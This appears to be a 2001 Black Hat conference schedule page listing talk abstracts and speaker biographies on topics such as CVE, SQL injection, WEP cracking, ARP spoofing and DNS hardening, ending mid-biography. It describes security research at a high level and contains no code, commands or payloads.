07/06/2001 : All available material are on-line.  Updated materials and missing presentations will be posted as soon as they become available.

Career Routing for the Ethical Code

This presentation will address the following issues:
o Trusted Software Used to Enhance Public Safety.
o Protecting & Serving on the Matrix with Apologies to John Quarterman.
o Who are the Elite, the Attackers or the Defenders?
o Plato's Republic in Cyberspace: Why It's Important to be a Responsible Netizen.
o Where are the Greenhouses That Nurture Ethical Hackers?
o Enlisting a Cyber Civil Defense Corps.
o CyberCorp Scholarships: Where Do I Apply?

Dr. William Tafoya: For the past three years, Dr. Tafoya has been Professor of Criminal Justice at Governors State University. Previously he was Director of Research, Office of International Criminal Justice, University of Illinois at Chicago. He is a retired Special Agent of the Federal Bureau of Investigation.

For 12 months (July 1989 ­ July 1990), he served as Congressional Research Fellow for the 101st Congress in Washington, DC. There he conducted research on police use of high technology as well as future crime. He remains the only law enforcement officer ever selected to serve in this capacity on behalf of the U. S. Congress. He has guest lectured at numerous universities and various venues internationally. In 1991 he founded the Society of Police Futurists International. Prior to his retirement from the FBI in June 1995, he was assigned in Washington, DC, Quantico, Virginia, and San Francisco, California. Dr. Tafoya served for 11 years at the FBI Academy as a senior faculty member of the Computer Crimes Training and Behavioral Science Units.

He was the first law enforcement officer to make investigative use of the Internet. He created the UNABOMber web site in December 1993. It was generated on a NASA computer because at that time the FBI did not have the capability to implement Bills ideas on its own computer system. Bill subsequently developed the FBIs Oklahoma City Bombing web page in April 1995. At Governors State University Dr. Tafoya teaches courses in Computer Crime Investigation, Research Methods and Statistics, as well as Strategic Planning. His current research interests are in CyberTerrorism and the application of Virtual Reality for training of law enforcement officers.

His 1986 Ph.D. in Criminology is from the University of Maryland; it was a forecast of future of law enforcement. He was recently appointed an advisor to the National Cybercrime Training Partnership of the U. S. Department of Justice. Both the print and electronic media have interviewed him extensively nationally and internationally. Twice he has been featured in U. S. News & World Report. More recently he was featured in the April 2001 issue of Information Security.

Kevin Manson: Kevin Manson serves as a Senior Instructor with the Financial Fraud Institute at the Federal Law Enforcement Training Center (FLETC). In 1993, while an instructor with the FLETC Legal Division, he pioneered Internet training for the federal law enforcement community and created FLETC's first major computer security training component in 1997 ("Digital Officer Safety") as well as deploying the first working use of wireless networking in a FLETC training program.

He is the founder of a Virtual Private Network, "Cybercop Secure Communities", which is networking the corporate and law enforcement worlds to strengthen our nation's "Cyber Civil Defense" as contemplated by Presidential Decision Directive 63. His personal interests include the impact of technology on society, promoting industry and law enforcement cooperation in information age security and policing and use of Internet technology to deliver secure distance learning materials over the Internet to the laptops, palmtops and (future) wearable computers of those who serve behind the "thin digital blue line".

Mr. Tafoya and Mr. Manson will be giving a press conference to Black Hat credentialed journalists from 9:15am - 9:45am in the press room.

Researching Secrets, Part II

BOOKS: The Puzzle Palace:  A Report On NSA, America's Most Secret Intelligence Agency. (Houghton Mifflin and Viking Penguin)  An investigation of the largest, most hidden and most important U.S. intelligence agency. The book became a national bestseller and won the Investigative Reporters and Editors Book-of-the-Year Award.  In February 1998 Washingtonian magazine called it a monument to investigative journalism. 
Body of Secrets: Anatomy of the Ultrasecret NSA, From the Cold War to the Dawn of a New Century.  (Doubleday)  A sequel to The Puzzle Palace, the new book takes a close look at NSA from the Cuban Missile Crisis and Vietnam to the present controversy over Echelon.  (Due out in April 2001).

TELEVISION: Washington Investigative Producer, ABC News, World News Tonight with Peter Jennings.  For nine years, until 1998, I was responsible for long-term, in-depth investigative stories from concept to final airing.  The stories have covered a wide range in both topics and geography, from White House scandals to locating spies in Cold War Europe to finding murderers in the Middle East.  Many involved complicated investigations in difficult areas of the world, such as locating principal figures involved in the Clinton campaign finance scandal hiding from U.S. authorities in China.  I am also the recipient of numerous television reporting awards, including the Overseas Press Club Award for Excellence and the Society of Professional Journalists Deadline Award for the Best Investigative Reporting in Television. MAGAZINES:  I have written on investigative topics for many national magazines, including the cover story on the Iran-contra affair for the New York Times Magazine, the cover on the Russian shoot down of Korean Air Lines 007 for The Washington Post Magazine and the cover on the Mafia for the Los Angeles Times Magazine. CRITICISM: I have written dozens of op ed pieces and book reviews for the New York Times, The Washington Post, and the Los Angeles Times. CONGRESS: I have testified on intelligence and secrecy issues before committees of both the U.S. Senate and House of Representatives.

CVE Behind the Scenes: The Complexity of Being Simple

CVE, the Common Vulnerabilities and Exposures list, is just a collection of unique numbers, ridiculously terse descriptions, and a hodgepodge of references.  Isn't it?  To most people, CVE looks quite simple.  And it is, by design.  But simple doesn't always mean easy. I'll delve into some of the roadblocks faced during the short life of "the little list that could."

When David Mann and I proposed the CVE concept to the Vulnerability Database Workshop at Purdue CERIAS in January 1999, we outlined the following major criteria for a good CVE:

  - enumerate and discriminate between all known vulnerabilities
  - assign a standard, unique name to each vulnerability
  - exist independently of the multiple perspectives of what a vulnerability is
  - be publicly "open" and shareable without distribution restrictions

I'll discuss the challenges that MITRE and the CVE Editorial Board face in trying to satisfy these criteria, including: what we got wrong in those early days; the terminological warfare that forced CVE to change its name; how CVE has taxonomical features even though we claim that it's not a taxonomy; how CVE, which supposedly isn't a database, encounters various problems that full-fledged vulnerability databases do; why some candidates have been around for two years - and why some might stay that way forever; the bureaucratic process for creating official CVE entries that nonetheless has its advantages; what's being done about IDS; how CVE can simultaneously suffer from too much information and too little information; how CVE entries themselves have evolved over time, and how they publicly reflect the education of a vulnerability analyst; why it's impossible to please everyone at the same time; how having CVE could have helped in the construction of CVE; the buzzword-compliant techniques that support the population and search of CVE; what's being done about the delays between the initial public announcement of a security problem and the assignment of a candidate number; how there really isn't a CVE "behind the scenes;" and whatever else I (or you) feel like talking about.

Steve Christey is a Lead INFOSEC Engineer in the Security and Information Operations Division at The MITRE Corporation.  After joining MITRE in 1989, he initially conducted research in artificial intelligence (AI), moving into the information security arena in 1993. He was the primary security auditor for MITRE's networks from 1994 to 1999, conducting network-based risk assessment, management, and incident response.  Since 1997, he has conducted research which blends his experience in AI and security, in topics such as automated vulnerability analysis of source code, reverse engineering of executable code, and distributed security assessment.  From 1999 to  the present, he has been the editor of the Common Vulnerabilities and Exposures (CVE) list, and the Chair of the CVE Editorial Board. Mr. Christey holds a B.S. in Computer Science from Hobart College.

SQL Security revisited.

As organizations get better at configuring firewalls and intrusion detection systems, what may be left out of the security equation is database server security.  As Microsoft's flagship relational database product and with chart-topping TPC benchmarks, SQL Server is poised to serve as the backbone of many corporate and eCommerce infrastructures.  With all of these SQL Server installations around, who is going to secure them?  How SQL Server security conscious are the people developing the products?  How can SQL Server be transformed from a vessel of your corporate jewels into an injection vector for exploits, rootkits, and other shenanigans?

The SQL Server security presentation will begin with an overview and evolution of the SQL Server security model.  Discussion will include the differences between users and logins, database and server roles, SQL Server service security contexts, and the security of the various net-libs.  There will also be some discussion of the scope of SQL Server's enterprise presence as it has found its way into numerous commercial products that may exist in multiple locations of many shops.

The following section will describe typical SQL Server fingerprinting, information gathering, account acquisition, and privilege escalation techniques used by attackers.  There will be some discussion of the various tools available to the general community to both attack and defend SQL Server installations.  Finally, there will be a clear suggestion for how SQL Server administrators and developers can defend against these attacks including doing some intrusion detection on SQL Server itself.

The final section will discuss the growing problem of SQL-injection attacks and how they affect SQL Server specifically.  There will be a demonstration of exactly how attackers inject SQL code into applications and the tricks they use to bypass even the most vigilant input validation.  Best practice development techniques will be demonstrated and how even ad-hoc queries might be better constructed as to not let attackers inject trojan SQL code into your applications.

Chip Andrews (MCDBA, MCSE+I) has been a programmer (currently VB/SQL/Java/C++) and an independent computer security consultant for more than 16 years and specializes in applying the skills obtained through security consulting to every aspect of product development.  Chip maintains the sqlsecurity web site that focuses on SQL Server security issues.  He currently works as a Software Security Architect for Clarus Corporation, a leader in B2B e-Commerce software applications.

Grabbing User Credentials via W2k ODBC Libraries

Timothy Mullen is CIO and Chief Software Architect for AnchorIS.Com, and develops secure enterprise-level accounting software products and procedures.

Cracking WEP Keys

In this talk, Tim Newsham will apply the techniques of password cracking to the Wired Equivalent Privacy (WEP) protocol used to secure 802.11 traffic. The presentation will cover the basics of the WEP protocol and how keying material is configured and then illustrate techniques to perform traditional password grinding on the keys.  A weakness in one of the key generators that permits very fast recovery of keys will also be discussed.

Timothy Newsham is a computer security researcher with @Stake with interests in networking protocols and UNIX system security.  He received his Bachelors of Science in Electrical Engineering at the University of Hawaii and his Masters in Computer Science at the University of Arizona.  Tim has developed computer security products for Internet Security Systems, Secure Networks and Network Associates and held a research position at Guardent in the past.  He is perhaps best known for his papers "The Problem with Random Increments" which he wrote while at Guardent, and "Insertion, Evasion and Denial of Service: Eluding Network Intrusion Detection" which he co-authored with Thomas Ptacek while at Secure Networks.

GSM / WAP / SMS Security.

Job de Haas, like many others in the IT and Internet industry, started his career in another technical field. Shortly before finishing his Electrical Engineering studies, in 1991, he came into contact with the Internet. From that moment on, he's been interested in computer security. 

In the beginning this interest was a hobby, albeit a very time consuming one. This was noticed by the first Internet providers that started to appear in The Netherlands. Their systems were almost never secure, and Job cleverly used their offers to give him free Internet access in trade for pointing out security flaws in their systems. This exercise in breaking security has proved to be an invaluable asset when protecting systems, since one can only protect what one can crack. 

Apart from this, Job has been a cryptographic programmer at DigiCash, which has developed a cryptographically secure anonymous payment system for the Internet. 

Polymorphism and Intrusion Detection Systems 

As the Internet and corporate networks continue to evolve and grow, much of the conventional wisdom associated with computer security will continue to be challenged, changed, and in some cases will become obsolete. This presentation discusses the effects of polymorphic attacks on networks.  It is important to note that the polymorphic algorithms used to craft malicious attacks are specifically designed to evade common techniques used by Network Intrusion Detection Systems (NIDS). While the use of malicious polymorphic code is not new, we are beginning to see a paradigm shift from polymorphic viruses to polymorphic attacks. 

This presentation will include a description of polymorphic attacks, to include the paradigm shift, encoding process, evasion techniques, TCPDump of polymorphic sessions, and the possible remedies of Intrusion Detection Systems.
 

Chad has eight years experience in systems engineering, network security, network design, and Internet design using various operating systems.  Chad holds a Bachelors degree in Computer Information Systems, has the MCSE, MCP +I, CCNA, and Solaris Certifications.  During his 4 years enlisted with the Air Force Chad built and secured several LAN and WAN networks, was involved with information systems counter intelligence, OSI investigations, information warfare, and exploit intelligence. After the Air Force Chad joined Trident Data Systems where he integrated UNIX and NT into a secure environment.  Chad then joined L-3 Network Security as the Exploitation Engineer where he researched, developed, verified, documented new vulnerabilities and exploitation techniques for a variety of communications platforms.  L-3 Network Security was acquired by Symantec, where today, Chad runs a signature development team for host/network based intrusion detection signatures.

Hardening .htaccess scripts in Apache environments.

Htaccess is an out of the box method to secure portions of websites using a username/password combination.  Several solutions will be presented, both theoretical and practical on hardening htaccess authentication.  In its natural form, it has serious flaws that will be explained in detail.  In addition a variation on Morris' attack will be used to show one method on how to break IP based authentication methods used by many of the third party on-line credit card clearing companies.

Robert, known formerly as RSnake and currently as RSenic, has worked for a major banner advertising company as an Information Specialist and for several start-up companies as Chief Operations Officer and Chief Security Officer.  He devised a method by which to make credit card clearing faster, more secure, and save large amounts of transaction costs.  He successfully negotiated a bridge financing round.  He has founded several security sites and organizations, and has been interviewed by many international magazines, newspapers, and television networks.

Alternatives to honeypots or the dtk

Honeypots have a long history and undeserved high profile in the securityindustry. Andrew discusses flaws with honeypots, and popular sites like honeynet who host honeypots, from a technical and risk perspective. However, as their use is moderately common in many sites, a safer replacement should be found.

Andrew will be introducing a new passive intrusion detection tool to assist with providing advanced sites with additional information they require to track down careless attackers. In addition, common sense security advice is given to help reduce the risk profile for the majority of sites.

Andrew van der Stock is a Senior Architect at e-Secure, one of Australia's largest IT specialist security consultancy firms. e-Secure only delivers their core competency: consultancy services, and do not align themselves with any vendor. Andrew has been in security for over six years, and in IT for over eleven. He is a NT/2k/XP sorta guy (dual MCSE, fwiw (not much)), with a strong open source background. He helped develop the matrox drivers in XFree86 and is the current maintainer of pnm2ppa, which allows Unix people to print to HP's worst-ever printers.

Andrew sits on a government panel on the future of DNS competition in Australia, giving technical and security advice (he is one of three tech dudes on a panel of 30, and the only unbiased one ;-). He is the current immediate past President of SAGE-AU.

Systems Management in an Untrusted Network: Dealing with backups, monitoring, administration, and logging in the DMZ

Throughout the progression of networked systems from mainframe computing to the Internet world of today, the solutions available to system and network administrators for handling core tasks have also progressed. Applications and protocols for backups, logging, remote access, and monitoring have gotten easier to use, quicker to deploy, and commercially supported. However, these solutions don't necessarily take security into account. While the risk presented by deploying a systems management application with poor security may be mitigated when it is deployed in an internal network, the risk may not be acceptable in an untrusted network or DMZ environment. One only needs to look as far as the ongoing exploit of SNMP vulnerabilities on Internet-accessible hosts to see where the risk management failed. Nonetheless, administrators must keep a careful balance between security and convenience, as the management solutions save time and reduce downtime.

The goal of this presentation is to discuss how to implement systems management components in untrusted or semi-trusted networks with an eye towards security. Solutions for backups, monitoring, administration, and logging will be discussed. Network architectures that support a secure deployment of these solutions will be presented and evaluated. General tips and techniques for deploying applications for systems management will be presented.

Cory Scott has over six years of experience in network and systems security architecture. As a lead security consultant at Securify, he performs in-depth technically oriented tasks for his clients, including secure architecture design, configuration review, incident response, and protocol analysis. Some of his previous engagements have included network and system architecture reviews, in-depth application review and design work, operational and procedure reviews, and emergency response for internal and external incidents for financial institutions, healthcare organizations, security software companies, and e-commerce companies. He is also the Acting Chief Security Officer for Securify, responsible for building an internal security office for Securify's Managed Security Service offering, as well as general corporate security.

He has written on security issues for Windows NT Systems magazine and securityfocus.com. He is also a technical editor, editing books on networking, systems, and security for Macmillian, Osborne, and O'Reilly.

DOG of WAR: Attack Box Design

This presentation is geared for those who build scanner and attack boxes for companies and personal use. I will also cover some of the different methods I use in performing Security Audits as an Independent and elaborate on some previous Penetration Testing projects, including Rooting the Attacker.  With time provided and forum interest, I would like to show you some Hacking demos, including ones in which I have been hacked. 

Blake is an Independent Internet Consultant based out of the San Jose / San Francisco area. He has conducted over hundreds of on-site surveys involving network/system integration and design for a variety of projects and companies domestically as well as internationally. Technologies includes Internet Security, Online Banking, Back-Bone Infrastructures,  Data Centers, ISPs, ASPs, Dot-coms, State and Local governments communications, ATM, SONET, Microwave, RF, Satellite transmissions, etc

The Insecurity of 802.11: An analysis of the Wired Equivalent Privacy protocol

The 802.11 standard for wireless networks includes a Wired Equivalent Privacy (WEP) protocol, used to protect link-layer communications from eavesdropping and other attacks.  We have discovered several serious security flaws in the protocol, stemming from misapplication of cryptographic primitives.  The flaws lead to a number of practical attacks that demonstrate that WEP fails to achieve its security goals.  In this talk, we will discuss in detail each of the flaws, the underlying security principle violations, and the ensuing attacks.

Dr. Ian Goldberg is internationally recognized as one of the world's leading cryptographers and cypherpunks.  Dr. Goldberg is a founder of Berkeley's Internet Security, Applications, Authentication and Cryptography group. In addition to developing many of the leading network software titles for the Palm Pilot, he is known for his part in cracking the first RSA Secret Key Challenge in three and a half hours; breaking Netscape's implementation of the encryption system SSL; and breaking the cryptography in the GSM cellular phone standard. In November 1998, Wired magazine selected Dr. Goldberg as one of the "Wired 25" - the twenty-five people who in 1998 are "about to change the rules all over again." In December 2000 he obtained his Ph.D. from UC Berkeley for his thesis "A Pseudonymous Communications Infrastructure for the Internet," which examined the technical and social issues
involved in designing the Freedom Network.

ARP Vulnerabilities: Indefensible Local Network Attacks?

ARP may be one of the most used, but least respected protocol allowing two devices to establish communications with each other across a network. Unfortunately, even with its critical role of mapping the logical address to physical address, ARP is inherently susceptible to a variety of spoofing attacks within local subnets.  While there have been discussions surrounding this issue and tools written to take advantage of these features, its potential to cause nearly indefensible denial of service attacks with minimal effort, appears to still be understood by only a few.

This presentation assumes some familiarity with ARP and will only briefly review the basics.  We will discuss the vulnerabilities and a variety of common attack tactics, such as turning your expensive network switch into a dumb hub, sniffing, and performing session hijacking.  We will then discuss some more unfriendly techniques including preventing individuals from accessing network resources, stopping kiddies from performing network scans, and best or worst of all, bringing all local network connectivity to a complete halt.  In addition, we will clear up some prevalent misconceptions about potential defenses and countermeasures, vulnerable systems and devices, and methods for detecting and reacting to these attacks.  Lastly, we will discuss and demonstrate testing methods,exploit techniques, and countermeasures using several custom tools.

Mike is a senior manager at Deloitte & Touche and has been working in the computer security area for over eight years.  Mike has extensive experience in performing manual penetration and vulnerability testing in a variety of environments.  His particular of focus and interest is in network protocols, and ways to manipulate them for various attacks and abuse of network devices and IDS systems.  Mike has worked as a consultant for a variety of commercial clients, as well as federal and civilian government agencies.

Promiscuous node detection using ARP packets

Packet sniffing is a serious security issue for a local network.  Malicious users on a local network can capture nearby user's data by using sniffers on a PC. Since, just about anyone can easily install and operate a sniffer it is especially dangerous. I will discuss a technique to detect promiscuous nodes running on local networks. It is a very practical method, because it does not greatly influence the load of the network and it can list doubtful nodes in a short amount of time. This techniques is effective for use with the common operating systems Windows and Linux.

I will explain the techniques uses for promiscuous detection using ARP packets. In addition, I will explain the three layers used for detection. These are hardware filters, software filters, and the ARP mechanisms.

Daiji Sanai is an expert in the field of network security and is also the manager of SecurityFriday.com.  SecurityFriday researches the security of local networks. They are very knowledgeable in the areas of security of the Ethernet layer and of Windows authentication. In his free-time, he is a specialist of private information security and web user security.

The Siphon Project: An Implementation of Stealth Target Acquisition and Information Gathering Methodologies 

This new approach to information gathering is the latest in stealth target aquisition technology. This lecture will discuss dynamic routing protocol internals, network mapping methodology, vulnerability analysis techniques, and OS identification procedures. Come prepared for an in-depth compare / contrast session between active and passive network information gathering heuristics. We make informed target aquisition notoriously fun and difficult to detect.

Christopher Abad, an R&D Engineer with Foundstone, Inc., is currently studying mathematics at UCLA and has also done considerable research in the security industry including pioneering work in the concepts of passive network mapping. He has given various presentations on this subject at security conferences including Defcon. You can reach Chris at chris@gravitino.net

Marshall Beddoe is a Research and Development Engineer with Foundstone, Inc.  He has performed research in the areas of passive network mapping, remote promiscuous detection, freebsd internals and new exploitation techniques with multiple non-profit security groups.  Marshall also developed and presented lectures on advanced penetration techniques for the U.S. Military and various Forture 500 Companies.  You can reach Marshall at marshall@gravitino.net.

Attacking and Defending BIND / DJBDNS DNS Servers

This talk basically runs in the Attack and Defense format, where we explain what the traditional attacks have been against name servers and how to harden your setup to defend against them.  The methods range from refusing queries from the "wrong" hosts, to chrooting servers to setting up split-horizon DNS / firewalling setups. 

Jay Beale is the Security Team Director at MandrakeSoft, makers of Mandrake Linux. He is also the Lead Developer of the Bastille Linux Project, which creates a hardening program for Linux.  Jay is the author of a number of articles on Unix/Linux security, along with the upcoming book Securing Linux the Bastille Way, to be published by Addison-Wesley. You can learn more about his articles, talks and favorite security links via www.bastille-linux.org/jay.

Automated Penetration Testing

Penetration tests have become a common practice in the information Security industry during the past decade. However it is still a very inmature practice in term of profesionalism, methodology and quality. Automating the penetration test practice will bring it to a new level of quality and trusworthyness. But attempts to do so will face interesting technical challenges. This is perhaps a new challege to the IS industry for the next years. In our talk we attempt to clarify and define the penetration test practice as it is now. When the proceed to indentify current flaws and conclude that automating the practice might solve many of them. Finally we describe the technical difficulties we face in doing so and a possible way to address them.

Ivan Arce, Founder and CTO of